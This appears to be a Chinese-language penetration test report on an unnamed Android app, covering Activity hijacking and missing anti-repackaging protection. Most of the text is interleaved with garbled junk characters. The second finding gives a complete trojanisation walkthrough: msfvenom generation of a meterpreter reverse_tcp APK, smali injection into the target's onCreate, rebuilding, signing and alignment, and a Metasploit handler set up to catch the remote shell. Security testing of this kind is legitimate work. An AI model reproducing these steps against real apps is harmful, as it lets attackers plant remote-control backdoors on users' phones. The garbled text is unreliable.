$ W; u. ~7 ~9 B
1 Y. C6 D5 t% d7 a4 v/ k: f+ M# R# S# K/ H
& ]5 d" z6 U+ Z( E5 F
/ \6 N: [& t9 P( K/ L/ I
2 检测结果 % @9 s2 v' F; b4 a% R3 [5 |
3 Y' s9 g S7 U9 G- @4 }7 [% E
3 R8 Y% f4 P8 D4 M( P2 x0 G4 O. G7 J* b' K8 N
, K, r/ }) Y& p3 C. p4 l. X4 n" f. |6 [ y
2.1 某某某
) E% c |9 M7 E# i* e2 U) l
. o8 m3 H# l, S2 J# U* R
3 `- Z8 u0 W. K8 f) t$ F
( I5 c; v- e% k$ d: K4 V. B
s3 s$ w" {7 X! `" e$ [
& E \- L: Z' f$ {/ | 2.1.1检测目标
" R. w4 H7 |2 T& W6 L! c7 P8 E
6 x4 p& T7 q* v# V# w
5 n- \# W) X5 P8 c
! Z: W5 f* l. e
* E0 q, \5 C# q. z# L; C+ x0 \1 V. C/ k' s
目标地址: 某某某某某某APP
% L( F& p, v5 p$ \3 D: ~- \, H5 ]9 Y/ @
8 ?$ V8 s! M) L$ r. n5 L6 T5 Z0 s1 X& K8 d' V
" ]. l0 B+ F2 g0 C# R3 t) G7 s! `$ L, `6 g, ^, x# P# X
2.1.2检测结果
2 O2 r1 e' B0 V& r7 L1 C, M# s% V" d8 R" A* r/ g0 C" C. |! E
/ g7 I' v- X8 Z2 w1 p; o
0 B# F1 a' {, p) x2 t/ [8 ^
: o& f7 u/ m5 g M& C' T, ~
; n) u: ?: x' G) G 2.1.2.1
* Q6 F5 t, x0 ?( s6 U) F. Q" X/ s; ^* }
" O! U+ }# y0 d6 c% ~
3 J4 e5 o) s8 e ~( S- k
D$ @. C2 C7 X7 C! t0 M$ \+ R; w
# j/ }2 Y3 @4 m6 d 漏洞链接地址:某某某某某某APP ' X8 T/ x* |# V+ y9 z9 p
: O/ x9 A; X2 d8 r, ] |
/ } \4 d! ~ v" m% G1 l
& e/ Y0 x' |6 A5 G
8 P, ^2 c1 {4 {& m! Y4 D1 T+ I; Z0 S% y2 R, j! t/ f! B# E3 e
, x# ^* z6 c' h( {. b" F7 t
0 Z9 }* f' ~6 W# l6 j! E
4 n5 D }4 c# Q/ l4 q: j
5 ~. u5 m/ S. h
* o C0 X+ v! ^$ J) V* [! y; y7 B2 R2 U& k8 x; y; g
漏洞分析及取证:
; {% R/ {9 }5 o& H- U: O* m7 k8 ?4 T' B
0 x. e" Y% @9 @4 ^( ^$ m- Q6 _8 Y
$ j z& f* \2 X8 j, T 8 y$ g$ R! U J' H2 g
/ O/ q* b* K# J/ f- f+ c 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 7 j- P0 E8 A* o0 v& P: m2 q
' Q, c% o# m" f. b8 s
+ u$ Q. V( R' N% M: Z! j$ L
/ O# l3 i+ l9 n, Y) ]/ z
& n' \- B$ W, K- o& o3 S2 K( x: M4 e. x8 u& W
- X9 o6 N7 O6 D
) o9 F: u/ K4 t n# s
- x8 Y# {( T9 {( v* Y# C# Z. w, M w* m. g
7 W* b, L u( l
. p6 D: E' c5 A, H
^5 h8 F Y: j% g2 L4 N% B8 }3 G0 v* [! B- C
4 ^4 ?1 l: n) ]. h3 |
: |* a) f% Q% D' C
! n5 G' y7 E) q5 L
- D2 X3 U- e# |4 v- Z! z5 S P 
4 Z' r4 O1 L/ M, G3 ^/ }1 ^+ m% ], ^! j$ J+ i$ s- |7 N, q
# t& e- i' R( ?8 z0 ~& D+ v
6 N# R3 {9 @& O. o- j
$ A7 n% m2 K! u1 j) m5 X1 o4 L
: E& f8 r) q, C/ E, v. J# N" ]
( S$ l* q5 ]9 G5 W7 c/ u) p
( M7 L1 L, M$ u+ `4 B4 \
( S' u3 f% h" `2 ~, z3 ?) X
5 m% g, N, r- A! ?
* N# `* t0 Z# I+ L5 A
2 X* ~* h5 l& {7 f 
/ j/ q+ I! `- t- R! ?4 D
' D, I( ^6 ?1 N$ {( ~) W( O. T! l
9 B# W2 C$ t' v
) C" G. o' C5 ~2 B" q d1 ?9 g
) e' M/ J5 E' [/ L1 }8 r" u' w
. `! S7 w/ X8 Q4 M6 J& x6 ~- Z* T 漏洞危害:高 7 c7 |3 l$ M1 g( \2 L! L* C' `. M
: w1 o4 R# ^$ p' u$ j: C
" `) B" _9 A8 Q# H( `7 I6 ~7 ?* e3 c" p) v O: k
' q. n" @8 E; ^( a" F+ H1 F
# X+ Z# z3 N2 F, h
. h+ I9 Z* Z/ y! B) _3 V$ b0 y3 g+ F- G1 K4 g1 g
' u: `: i3 \% h) c0 b' e4 ?. H* z; O3 y! }
' a' ~+ m: o& f7 \# v
0 K" J) X! g5 y4 `4 i |
2 L$ w" u- M m; i3 b4 b# ]0 D& B. A E
! k: g" f* [7 ?5 B2 |
1 a& Z9 W9 O! f 严重程度
% k+ r- x; e( q9 o) x6 b6 V0 Q: r# C) g2 V, M& H
% T3 K) o& ~' R- h6 R# A5 G
# @3 p$ E1 y S# S$ g; Q | 7 q& x p; a. i+ Z2 v
& Q8 N$ ^! c% J% z& e
, z; e% y5 R9 a- }) w
+ w9 q, x, C8 h: i7 n 8 H/ e5 X' Z; v: k: o! j$ q& i
4 F! y' T, J/ j4 g 高 ) F2 A. i4 }2 y' E
" s9 ?4 d3 _( l! g* S4 Z0 i7 p* E
* t& k: ~2 A* X; e' e! A' b# z! U K( ]
|
0 F7 U6 Q4 V9 T. T5 w; O) ^
" J* L2 |4 ]* u. @! b% K1 s 2 @, x4 ~# N3 c! ~, J. d
3 k& D+ B. t2 r
1 b. x. `7 m% k; Q
! F0 r, Y6 E4 `! w' C. Q
■ ) c! ?" h! w2 z3 F5 u
, Z9 x5 \. ^6 r$ N0 ~ * w3 X/ O K& M4 l1 e' d( J
- `! j6 S2 J/ W. B$ H | 1 a- R! a' U1 W. S' I
) t) P4 i- k3 c/ z# H
; H7 `/ Z' n0 p* q+ ]/ a( t% k" r1 Q3 K' f) H8 ?' S0 G W
8 K; Q( F4 ?6 V4 K. O) N3 t1 B" @/ @. c) {' y7 k
中
. p) t- w4 Y2 k% B6 `
& _$ F; H/ z6 F% t" Q1 r E * ?' ~3 K7 {# G4 P
6 G! X: D6 _! C. A1 _: r
|
8 g0 d5 U' n; o- f, G7 Z( e: b# z |# ]! ~8 X; |+ h1 ?
3 |* [" D4 j8 t' X! v
P% x+ R; \/ b$ H. ~
2 O+ O9 z( R) l+ C9 Q7 q9 J2 X8 Y. h' b4 c+ X8 f
- x1 K F& p9 S9 a! s, V
9 F7 Z# C. _7 O4 g4 I7 t% w0 E
! x: D" `, L/ [% n) i' D
2 P5 G, N# i9 O2 O
|
8 z7 U) A) U8 f/ I' u' d) F% W& `' H
, t8 V1 T. G: s) ]. S" P
( M4 F* l& m- z2 E4 k: z6 J. Z8 a- E4 K$ q1 U
2 o( \: W& p5 y7 s% j) T
6 }; L# H* @3 }/ G
低 ; t7 ~' Y+ P, ~! O! X
: Y. `! `2 \. G/ _! X & y4 `& X" Q5 \" g7 f8 T; {8 z
( A+ J# a9 e7 Z2 R% R2 W | 7 w2 p- E- R+ H
( Y) N: @( r4 r, \+ ]( ]) }
( B; ?; B) n# i
) ~1 ?' Y) `$ S/ j: I+ y
7 p# {& f; g& O7 i- C
6 g7 a3 G6 |) x
# |6 f" a$ P8 d, n4 g( M+ [
6 T+ |% _$ V6 V3 b8 \. O
, Q6 g, f- F& P) T
. k5 @* K0 F1 U4 D$ l0 n% q | 6 k/ a" Z, _: F4 @
J/ G) b z' G5 u* r7 U
5 Z! t6 D. e* i) n9 P1 J
) ?. q9 }! Z' V8 u
# |; s5 a1 h8 |- h; k' B* o/ U
1 r" W! m: d6 d/ }
" _( g! l& m0 O
]4 L, W5 @' `) w( M! n7 y
% o& ?6 V& v' [* s8 L4 y. L
+ Z6 G' _- z$ s0 q z, T
8 ?( |, S- ?& g: C0 X- _7 p0 A. k; |) D: l
( x% f7 N9 E' b9 n6 o8 ~6 [. @6 k, `+ p
$ |+ K+ ?/ x0 I5 b' L
- ?7 O+ N6 z3 h6 V1 a, z
+ n& j1 N- D3 |3 P8 j1 ?9 h6 T" z
" X4 W# @/ C% i8 M2 K& Z 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ' t3 } G" S+ R. K2 I& }
/ y9 V8 J! C6 ?+ ]8 [& y" x
6 S# A6 `" O* N2 M; U# U0 Z: f- q- N& ^
* C: S% ^- A! k( r) u7 d+ M- A& f( ~2 p! s7 \
z) N1 E9 g3 |$ I$ g% K) r
6 r, S/ Y6 I! V0 q) }
: `3 @. |. g0 H1 i! Z e
" [! x9 N0 P/ A6 F % n9 U( g8 k" P+ i: ~/ e* Z
/ ]' A6 [8 c* Q+ Q6 ?. b, \
: d* C- X3 @2 H* j6 F f( L/ ? v l3 ~4 t4 T: v
4 w: ^7 Z- i! \% E. f1 y7 W" J+ F' U/ c% a8 s! X4 N7 I& L: N, `
( T5 M! v- o4 h# {0 s
5 I; X0 i6 p0 H4 g. I$ g: E- t
2.1.2.2 * m) I. X6 G1 U
5 I" l, m# `0 u- b0 ?) Q
' T( l) z4 k- Z" t2 z* S' b
) ]) L/ r9 S! V" s
+ y7 Y. p1 x; z& d
5 z' o+ C* h. X1 ? 漏洞链接地址:某某某某某某APP " L% @3 G, h1 F8 W5 l; q$ \
0 y4 X m5 ]* z
( x; r. Q8 R Z+ j
$ X! j, [# a) M. c; q X" K
8 ?5 k. G. G0 T( [# ^/ ^& M1 ?1 `, t0 z$ r3 [1 Z. a
漏洞分析及取证: / |0 j' N3 ?; y3 s% d( z; G( {5 K
( q5 }- k& _2 F9 m0 W* a- \; K
7 V y' P7 a4 k5 Z6 Z! x8 j9 {3 b9 Z, y6 V* i% h3 a6 t, Q
+ U6 U# K+ F1 g, f J, ?9 |, c7 S4 E6 U
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: $ ` w+ `* b& A$ { Z0 _% B! M
6 G, z( g& d. S4 v- v
$ @/ I; o5 f% I9 s6 m
, S! l$ w( J" Z# Z u. a4 d
+ J1 r$ e6 B8 y- s# s. a/ ]
) D; J, S% D% ^
用Metasploit 生成木马 apk , c% F0 _$ e1 r( C1 v' q( n
! {4 X. ?9 u: \5 Z+ L
7 |% R6 S, m& y) o K2 |% {( f- b: ~' F/ y Y b
" L4 F. q5 M/ ]1 Z& U; U
. I* P& [+ N5 u; Z; H) J msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 3 Y6 P# G7 F/ r2 a$ Y
" t$ Y5 ~* i B N
* \1 N! a" Q8 J8 z2 c* y
o5 G4 N! P' j' P8 u: k
, u9 {0 `9 e/ v) N
, R. f/ O: M6 g4 X. l" U 反编译目标apk和木马apk # s& K9 J9 K i
; D' g6 f0 N! s U
1 j4 ?; L4 B( K4 J( \+ s8 D( J7 r3 t1 Z) k b! q% |1 p; X- z. y
$ u y: C: T$ e/ Q+ D/ \/ P8 B
& C8 a5 P7 G2 j& m" G. i# c apktool d target.apk
0 t: K& @9 x0 ` V6 ^# z
& k, Y7 [8 v( C4 L' b$ b# ?0 S7 e
apktool d cockhorse.apk ( g& B: ^0 L; X, F# |
0 R, K5 c! E8 w0 [/ Y p% I
8 D0 \% W6 h9 h4 T8 X) X! Q5 K
0 j% ~" p0 ?" `" }, _
' N: c/ _& W8 l" n; y( u. I: y; N* d4 B
木马 apk 注入目标 apk ) g. C: l8 r; N: s; P1 A0 z
9 V v2 a6 g. a. R1 k Y
7 x& g6 t7 f6 @, R* E8 o# Z
% ]( v3 p' y9 F
/ i3 M' l! m. y7 P; D! E Y0 Z0 F1 B# a7 d
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
* Y# W' D6 ]# b% K* M
- l. f" A9 ~* I invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V / q& n& G. ]; E1 a1 F
- ]3 |! c& D* |: E$ V
, V$ H: K" E3 |# O7 P! |4 J; A. [ l8 l: o0 o) ^: D
- n* K/ D+ `" U$ o
/ `& a B. `0 M 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ; w1 q7 S6 G- N1 V& t
& W1 w. q8 ?0 _5 Y: O
3 P7 s2 O3 x) c: m+ ?* t
; X! L0 b! ^7 o( _. p
7 P8 w- D1 j/ }( U# b; o* F' k8 E- c' ?' n
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 " b: k) [. J) t4 l6 W
0 n* g I4 {( u1 f5 u( f
1 H$ \/ y: [' |; s
3 Y, K. g% o1 _* F 9 Z& C' d2 J+ L N& ?
2 @0 E+ O8 o2 N* ~; q9 k 回编译生成最终 apk 3 V# a- O I' I7 S; S. i H; `
9 |7 O3 [1 w4 K% U
* E; {0 Z! n1 E: `9 O, J( S/ n
$ u& [$ j: w6 b: k* _% c6 Z # H8 d6 B B$ j5 q
) ^; r8 {5 n& w% H# ^
重新打包
6 U: T5 H/ l& M- w- B: N8 e0 q. E; h$ |( [' X+ V
|) u6 D0 |4 X. b3 J; B! ?
4 }2 F$ S6 U( p/ `% ^3 R7 ^) o
8 U# Q1 `% ?$ @' t4 |7 n
0 g$ D# Q/ ]* k1 x0 s2 w* i apktool b -o repackage.apk target_app_floder 9 q- h5 w& O8 i
; Y1 h" `5 d' ]( q, |* e s
, Z5 J6 K3 f0 l8 V6 ]0 n
2 m2 m) {" C; C) n5 |
3 P2 @% z4 N2 ?4 A9 Z8 L. j' h3 p9 P0 r. p8 ]0 b8 S
创建签名文件,有的话可忽略此步骤 $ V/ d$ S2 z. F3 }$ z
2 Q# w9 b- E5 K3 }3 q
+ n. R1 a2 a( e! P5 B2 X* k
& w" R7 P; {! u f, u0 u- J& V 9 s7 F0 [" A& Z2 v/ `" S& c
/ w) a. \' _1 p. m i keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ' m7 Q0 i# n$ e; m! V# t; n2 s
. T( E7 e l! Q, G0 N; L: i
: d& e8 l* c7 i
$ s: ]3 G; B: W6 _, ] e9 s- F2 ?
' [4 Q% @* m3 H) z I
* ?) n5 u7 O* m% D. @3 ? 签名,以下任选其一
2 A3 |# M: d+ W3 X! t
1 r# M4 b+ V. B
8 y, ~" N, j; V/ ]
0 V1 x% [4 P2 D) m0 T( A
5 t8 P+ V& V) e9 Z0 f+ m d# F0 k
: n' d1 x1 w7 t; p" e3 ]: ^3 d8 x jarsigner 方式
- S5 e( F! }! n& {. i' d D! m1 L- i" W; S5 A
* T/ r( @! D% n+ B0 }0 _" _1 K! n8 [- e; f, J& ^0 ^; q: S
! c* `3 V4 P; h+ U
7 X& A& K* N% f0 z jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
- ~3 b }6 ?) T. W7 O2 C
5 y3 n# i8 }- H, j, V# Y4 A
" `' {6 }2 u$ _2 ` D! ]0 G3 S% P$ T* _' }
/ v' j) J) | |3 q# J, S
5 K+ I' M6 ^' y7 ?: N- [- ~) Z, `. x1 [ apksigner 方式
; p9 k `6 a# q' z) R1 p/ Q* F0 S5 k( w3 s
/ d4 R/ c E& J) e" R0 c6 l
8 l2 E$ o: r) x0 s & z w m* |& P' v; f
% j% B2 T9 r! i+ C3 O/ L
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 7 t, `' u* F* Y% C
# y5 M: E; M. l% M+ }3 A1 ~
. c2 |4 N# o+ Z F) q; _$ K' L+ m6 K8 p
$ z+ k' e$ R5 S( |$ ~
, g. u5 _5 C" ]; M
如需要禁用 v2签名 添加选项--v2-signing-enabled false - p6 k9 s) ~3 b: t1 y* `
8 e" E( k. O! v+ w1 D, r% h1 s
, Z0 Z7 b1 [ e; \; ^" ?% u
4 Z, ? l# E) Y3 I: T9 ^, f: A. Q ( q# d: \9 x+ t
% z/ e/ H# b7 T# J. _' ^$ Z 验证,以下任选其一
/ [0 }9 ?4 t, S- H4 r& ?6 y5 q1 {; `
8 n7 q; y& Y' {% ]( A( T" x7 t
2 T7 P& @- q) B6 P% Q9 y, k0 u2 E9 _
1 K) S" W/ @8 c* E" p
! m9 b" _6 s# X
3 y3 D0 ]' C5 s jarsigner方式
4 M# N+ p( X/ X: E6 P
) Z9 I' ^" m* M4 H4 _- z* l
" v, j( n- E# u
, I1 y+ ^2 M* e7 l& ^
2 S/ ^& Y h: v) _" b$ h* o
. V7 U1 u5 N4 M- h* } jarsigner -verify repackaged.apk * D/ H9 n. l- h n
+ Q6 v2 E8 {3 w$ l7 a% J- s+ K6 E
9 [7 v1 j9 M/ [0 b
+ _7 R" F! P8 s7 K* n* b6 w3 E
: r5 N3 X% m, x. \, G0 d P4 p
% t9 e( E: ]8 X* F5 l apksigner 方式 7 ^0 c3 A) ?& y0 m( L
$ e P! `3 o& [6 o* j
/ L9 K/ g* a+ m# Y0 v7 L* w( x
9 a" k0 l. Y/ n
! v+ ^0 s1 D: C+ `' n" \: P
5 B9 V x S s. k" b2 K apksigner verify -v --print-certs repackaged.apk
7 {% G( C3 J) t0 y+ ^" ~6 t7 W& g3 o& s# Z( L
, K9 v' ~+ i4 C7 }; W# U5 r
9 t) ~: _# T2 o
) x+ `5 R# A. R3 O5 |( q
1 s$ x7 h t' j- F/ X keytool方式
, k, b H! R' f: E* ~6 W& F$ h
( H4 a# g1 X. u* ?) j
: f5 q8 x0 B* m. @/ E3 S; y! i C( O, ?5 b
7 P% W9 h6 q5 v' c" f5 N) z$ E6 A: k6 m: }% ~1 m6 w
keytool -printcert -jarfile repackaged.apk
3 v2 U4 Q W1 [7 q$ Y/ V" n; i1 j" y! z1 V- o
( _0 m5 G8 j& j
0 h+ T$ W, i9 O7 {$ }4 H3 a
/ o1 a3 _9 R9 n9 N& C6 X4 v/ {" B, J8 q! z2 l
对齐 + L( A/ O/ K# y9 T/ J
% J7 [) d0 z$ n+ u6 \5 o
: p# j' _* J; c1 i3 Q4 d; V. ~. s% W' [
! N; ~' c0 L: K
1 }5 Y' a# t; z W. t
3 l, s$ A- l; u8 {) r8 I: B
字节对齐优化 9 D; |5 H9 X4 c5 R6 t$ }
5 P/ `8 F# _7 N. _! c2 U
+ O3 X, v7 e# N* `; e( g6 f+ m
4 h( k; G% C5 ?; F( X: J
; J3 t# j+ B6 d& }9 @* z! c2 L+ A" h- U8 d( Q) h, U* v
zipalign -v 4 repackaged.apk final.apk 4 z/ D9 V! |) J+ C. C
0 o9 C4 Q0 C& j7 g
7 M1 a7 e3 u0 A/ [# `
$ v% E" W+ ?% o2 a( f7 i' ~
& z' k" A7 p% p) Y
{+ _, a3 T% |9 f1 Z" A& l- I 检查是否对齐 / e7 Y0 ?8 o6 y9 J" d L& i
9 V9 M% u! J# }2 ~! R; z
4 J* }. V% L- ]! K9 _
1 E" d! \. \4 b* l
9 `! @% f ]4 q, c7 b6 n, }
% D# C" o C: d" Q4 ~ zipalign -c -v 4 final.apk , G7 |. q" ^0 n% f
! w1 e: c! y7 T
6 L2 f3 _) l/ R. O) m2 t
& T. J- T$ O! `% ^. n( N; @9 y
1 o/ X1 H6 h: e7 \- A
+ l! L$ g$ w- f7 O
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
8 M( j& O2 z5 P/ f; J" m' ]
1 J, W% ?1 g* @) U% O& |
% I2 [4 z3 l. Y5 B5 ~+ [0 k% g% e
/ |: m' V6 C" W. L
& r5 z9 s* K. W9 v( r8 z) H
1 _" l4 ?; b5 D) Z$ K6 o$ ?
启动Metasploit控制台,配置参数等待上线
$ }7 A. d* M' R2 e' q# s4 k9 j: w! o/ P5 T; V, g
& F/ O- \+ ~& `8 U8 l+ e X# a
: w# l! {2 u2 V* ^- h : F2 O4 E/ Q) R( k! I: d
3 i: t1 S$ ^9 o1 V+ O" Q$ I" ~ 在终端依次输入如下命令 9 u6 V/ G! n- o
2 D" e$ d" P$ J6 }
: M- J' Z0 S1 f9 p
( \; i3 ?9 ]" m7 x ' N) I3 X+ G2 D
7 i0 x2 V9 |) x% M* V5 d
msfconsole $ I) b7 n& {/ ?4 I4 b2 i2 ~
2 n) A4 g2 z, ~ }* N
& d J G" t4 j& j! o0 S$ L( p' N3 I1 s5 K
( e; X# Y9 _0 T0 R4 Q+ P
- E" N6 Y% J: w- _# ^
use exploit/multi/handler & O0 Y' j# V! L0 R
7 B4 o9 S" e" S6 v
: Z( r/ i2 ~0 m6 d7 R+ S. r
1 T; l* L/ l7 n) p5 L ; i5 e8 |5 d' e4 l2 H5 Y& g. {& r
- D. a' l5 i [. c, e- V/ N
set PAYLOAD android/meterpreter/reverse_tcp , }; Q# x) R! a5 ]3 J: m
& C8 l6 u' J$ X4 \
, f1 z( C s: U9 t
# r& \0 v* K6 [6 p( h0 X
) |3 U8 ^2 a- H2 K& }' C# s$ e' D0 x' N( b. o: o% a; C0 c0 F
set LHOST 192.xxx.xx.xx & N- Z( _& F6 H1 i( U9 v
" Y8 G4 j4 N8 P' g/ Y
8 i3 B) y# E5 C" \% @4 @/ O0 K+ T
4 D( h1 e8 S+ `) ~
# ^! ]7 v' o& ?
4 h: G0 ]0 ~8 |- J/ y% h( ~ set LPORT 4444
* U G `# z+ B6 y( Q7 v8 w0 ^2 Y6 o9 V" o# r% U
. E, F8 }: Q5 x. l2 \7 O
$ b! `" ]% ?4 N$ }1 j% T" L4 A# @* C ' S5 {! P0 Y/ z6 ]5 S* p# V! W, z
/ x7 G. C7 K% k/ Z! d C
exploit
0 v1 i' [. W3 O, O ]0 M0 y/ Z d* ^" t0 E U. p
, |4 p5 u/ J7 C/ O
5 S7 [* @+ {0 p% ]2 h$ G
+ ^5 q z; G4 r/ z) F" H! J
7 {; q# K d+ W C/ I, v/ t3 H 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
$ p7 ], i# O8 P4 B; ^& V
- C0 ~' m2 R f: U; t! m1 E# }
8 B+ ]. m& ?9 J& l5 v' u$ H8 \) _( Z
! q5 O1 f! s8 d) m: n, j0 l" @
; k' ]+ @+ ]; j! j
漏洞危害:中
, o" v7 w* M6 N6 T0 u( B% f# ]
$ @: ^, Y5 Y& U- o; |! {
& S- A2 {6 Z; S, r( b! e* o3 s+ [3 ~) w1 [
3 F, |! }/ L- I) }+ n1 R. u8 F, L `- g0 Q, Q% y6 H
2 O& u' D7 r3 p( ^; ]
( @' {4 @% {. B' Q
: V+ R& T% |$ w- b1 B$ T9 c" c, r0 ^# e# q! Z4 L3 ~
]9 C" \- {9 ~0 D8 ^
6 o# V! g( i: D' s2 C9 } f6 H
H3 Y* a5 g4 ?3 j w. a( M
. V- I6 ~- k; Z# U3 |2 Q | ! \4 a b+ m* a: K: w/ {& O
% B2 P5 a5 ?* U9 D
0 S; u3 C. f* {9 h/ h. x& l2 a. m: ]' r1 {, n
严重程度 , i% j/ p% g$ W
$ ~9 ? d2 J! { f3 z4 f
0 O) S2 V. H3 L6 |2 u9 m# F" v6 [; a9 T2 _& J
|
3 h7 V, o" R* W4 |) {* r: `6 M P9 o
- N; Q9 I/ g" @: E4 G! X+ W4 X. K2 F7 t9 E# X
6 h' I3 }/ k: }8 O$ {: S" c6 N6 N
+ c' H9 l% U! B5 T1 E9 l8 [
高
9 Z/ |4 @0 M+ x2 K8 I; f" o$ e+ z8 ]( _6 J( a/ V) }
5 o0 T* v9 N0 m% t* I3 E! i' c6 v0 v+ }6 y8 a5 P3 r# |) G
| * ]8 a2 e$ ?5 A, e
) V/ A% g# i+ P9 ~ T) X
/ r) f$ Y9 {; F/ O
% b" E% B" v! p1 S8 {$ z+ G- @* }
2 k6 R* ?; N, Y1 A m6 o
- N8 q! t, Z8 f7 T4 ?: a ■
, i i8 Q# R2 L6 M
: Q* K- y: c1 k; c' D0 r) i" D F# p5 A$ ]; D
5 { f7 a: j7 ` |
) ?* ]3 u7 B+ r5 y2 h; [/ [, l! H
# R7 z) V* t' T4 v
5 N- I6 T; o% ^; A+ m; K
' ?5 M. h5 j. D3 q- N 3 P5 h0 @7 o& z1 N. ~
2 V! @8 T& ]/ E$ f) C
中
- ~8 g2 g# q+ Z/ _9 E( `
6 } M$ z8 A( F9 V* t+ Z" o% N/ j
# B4 e1 F+ V4 ?& ^9 f) H
1 ~# a' g/ g1 r* G; j8 K' v2 O* { |
; c0 x2 D# H/ f# { ]( {
& B# Z2 Q* l2 i; K( `* e, `; Q( q
, S9 g# W6 o; j2 p$ [6 V0 N( Y& d7 v7 ~! s
G( m) E6 Y7 o) l* V4 k
( t9 S2 L: q5 @: I! m
2 Z/ H! E2 M$ Y7 H& J- q) q: a7 l% |. E8 }9 p' `
9 {" y5 u4 n" j F$ a- Q% \
& k& c1 v2 F* W/ } p4 i . ^$ y: h' z: n' h3 v& B( d) {
) z4 Z3 d1 i% u. B5 I2 Z5 j) Y; B |
5 C, m/ k1 N/ t7 a/ K0 Y: g0 l T" a) n% D( A
' K+ o+ H+ a2 D7 j6 Z9 ]9 |" h/ W/ L1 Q5 v
' P2 F" J5 Z, [
- x% v* p# J6 x5 R2 C 低 / ~5 j( a8 W w% P" ~" x8 @9 ~' b3 A
7 \$ O: Z I8 A2 n1 u5 W
8 L# |" b% F i! m$ ^& I7 F# W
| ) h H! h1 Z9 w
% }4 e; Q, P* A6 B8 C& s( C
9 Y9 `+ I" S2 l$ w% P) ^" _" a' ] R# r3 C* v) y
" {; [! y3 K8 J7 T
% j3 t/ W: v4 B
4 a. p( U1 d, B1 ?
) O. _8 B j3 W1 c7 I
% a" K6 M1 P+ f. N8 x* N% S+ L4 q% q% Q$ W- w$ J+ l! }
& M% z% j, H t1 h- v
/ n! N0 g, y4 H8 s6 K% N
|
; i) R- \7 v" a$ G. f8 H
4 p3 B: F0 s: P X; u3 X) u
2 ?1 P* ?+ w. K( h1 ]- v4 Y( j
4 ]+ J8 X2 a( F! s 8 u. S% b% k' K5 [/ t. `
4 F. {! I$ n( i/ B2 M, ^1 i+ I4 s
: ~9 k; R1 y0 s3 u2 |8 @- b8 b; o3 u/ D4 x0 _
% |9 e# _" A- P* l7 C
~! _1 j. E) u2 n' J. f: o5 L- }
6 @! U/ s, S* r8 u+ t7 v& n8 B: U: R# E+ e, g9 s
. P. ^. I9 {' g
R( N8 X2 F: \, V* V
$ E6 F4 ^5 W _1 D( {
7 ~" @' S# n I1 q, v' f- r8 ^* g& @ 1 s7 Y5 y* r1 D! q: K( Y) F
; r9 x% h% C0 C }- [3 M
修复方法: 1 v, o: }: @& E5 _% J- V
" _; B& N0 Z1 ?2 u& t
! v, F# z- h0 A9 U
* Q: y1 O) Y& _+ Q! k! f! ]8 p ! I6 ^$ f( n' ^- V* g( n
* }- O! n: S" x0 N4 S6 e 1.在 APP 启动时应做签名校验防止二次打包。
: i& `7 C* l4 e; C* P* C( B
4 T* l) t% x7 T) g7 s 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
6 _2 U' w" x# G, \$ ]4 k
) g/ m I8 [' i4 j: J
2 y# Z4 n! L( x1 I) X, I* R9 _
* _ f& O8 r. F" o
% L( N# J1 z8 j* E+ Y) s; q E6 s* ^* k0 F$ u9 \) I
' P$ ] g5 i: F
( R1 u9 Q- y4 E x2 j
' n; s% d! j2 P
, b V! I% ? r
% q1 S; n* C2 P) b. @8 s7 J$ O: d- u8 ~
h2 }# \) T# M# ~
/ o( ?5 p$ {- g! J/ r9 D( \$ N$ [& b+ o: N4 R
, e' Q/ R0 t" x% O: a
* b: B6 [* q5 Y7 A) q* v& A
3 M& H/ M; D. N' g% P) g
8 z& k+ |' i( P' I; f
0 S. ?* `" R# f! N
: @% Y* y0 _8 K! R8 N2 u) H